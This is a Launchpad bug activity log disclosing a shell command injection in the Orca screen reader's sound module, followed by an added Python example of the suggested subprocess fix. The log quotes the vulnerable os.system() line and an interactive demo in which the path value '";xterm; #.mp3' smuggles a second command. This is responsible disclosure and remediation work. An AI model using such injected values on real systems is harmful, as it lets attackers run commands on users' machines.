Activity log for bug #1477724

Date Who What changed Old value New value Message
2015-07-23 19:03:39 Bernd Dietzel bug added bug
2015-07-23 19:03:39 Bernd Dietzel attachment added orcabug.png https://bugs.launchpad.net/bugs/1477724/+attachment/4433234/+files/orcabug.png
2015-07-23 19:11:16 Bernd Dietzel description

Old value:

The python3 Orca module named "sound" can be used to inject Shell Commands.

File : /usr/lib/python3/dist-packages/orca/sound.py

The os.system() call in the sound.py file uses self.path which is the attack vector.

line 49-53 :

import os
os.system(
'gst-launch filesrc location="%s" ! wavparse '\
'! autoaudiosink > /dev/null 2>&1 &'\
% self._path) ######## < ------- Here is the Problem #######

--------

Exploit Demo which runs the program xterm when a bad pathname is used to play a sound :

theregrunner@mint17 : ~ $ python3
Python 3.4.0 (default, Jun 19 2015, 14:18:46)
[GCC 4.8.2] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from orca import sound
>>> self=sound.Sound
>>> self.__init__(self,'";xterm; #.mp3')
>>> self.play(self)

------------

See the attached screenshot

Please use subprocess , not os.system.

Thank you :-)

New value:

The python3 Orca module named "sound" can be used to inject Shell Commands.

File : /usr/lib/python3/dist-packages/orca/sound.py

The os.system() call in the sound.py file uses self.path which is the attack vector.

line 49-53 :

            import os
            os.system(
                'gst-launch filesrc location="%s" ! wavparse '\
                '! autoaudiosink > /dev/null 2>&1 &'\
                % self._path) ######## < ------- Here is the Problem

--------

Exploit Demo which runs the program xterm when a bad pathname is used to play a sound :

theregrunner@mint17 : ~ $ python3
Python 3.4.0 (default, Jun 19 2015, 14:18:46)
[GCC 4.8.2] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from orca import sound
>>> self=sound.Sound
>>> self.__init__(self,'";xterm; #.mp3')
>>> self.play(self)

------------

See the attached screenshot

Please use subprocess , not os.system.

Thank you :-)
2015-07-23 20:28:41 Bernd Dietzel bug watch added https://bugzilla.gnome.org/show_bug.cgi?id=752796
2015-10-26 18:21:49 Bernd Dietzel information type Public Public Security
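
The request in the description ("use subprocess, not os.system"), worked through as an added example that is not part of the bug report or of Orca's code: it tokenizes the reported command string without running it, then builds the same pipeline as an argv list. The names `commands_seen_by_shell`, `safe_argv` and `play` and the sample `beep.wav` are assumptions made for illustration.

```python
import shlex
import subprocess

# Format string as quoted in the report (sound.py, lines 49-53).
VULN_TEMPLATE = ('gst-launch filesrc location="%s" ! wavparse '
                 '! autoaudiosink > /dev/null 2>&1 &')

# Operators that end one simple command and start another.
SEPARATORS = {';', '&', '&&', '||', '|'}


def commands_seen_by_shell(path):
    """Approximate how /bin/sh splits the os.system() string into commands.

    Nothing is executed: shlex only tokenizes, keeping operators as separate
    tokens and discarding everything after an unquoted '#'.
    """
    lexer = shlex.shlex(VULN_TEMPLATE % path, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def safe_argv(path):
    """argv list for subprocess: the path is one element, never parsed by a shell."""
    return ['gst-launch', 'filesrc', 'location=' + path,
            '!', 'wavparse', '!', 'autoaudiosink']


def play(path):
    """Start playback without a shell; output is discarded as in the original."""
    return subprocess.Popen(safe_argv(path), stdout=subprocess.DEVNULL,
                            stderr=subprocess.STDOUT)


if __name__ == '__main__':
    # 'beep.wav' is a constructed sample; the second value is from the report.
    for sample in ('beep.wav', '";xterm; #.mp3'):
        print(repr(sample), '->', commands_seen_by_shell(sample))
        print('  argv:', safe_argv(sample))
```

Taking the shell out of the call stops the path from being read as shell syntax; it does not check that the path names a real sound file.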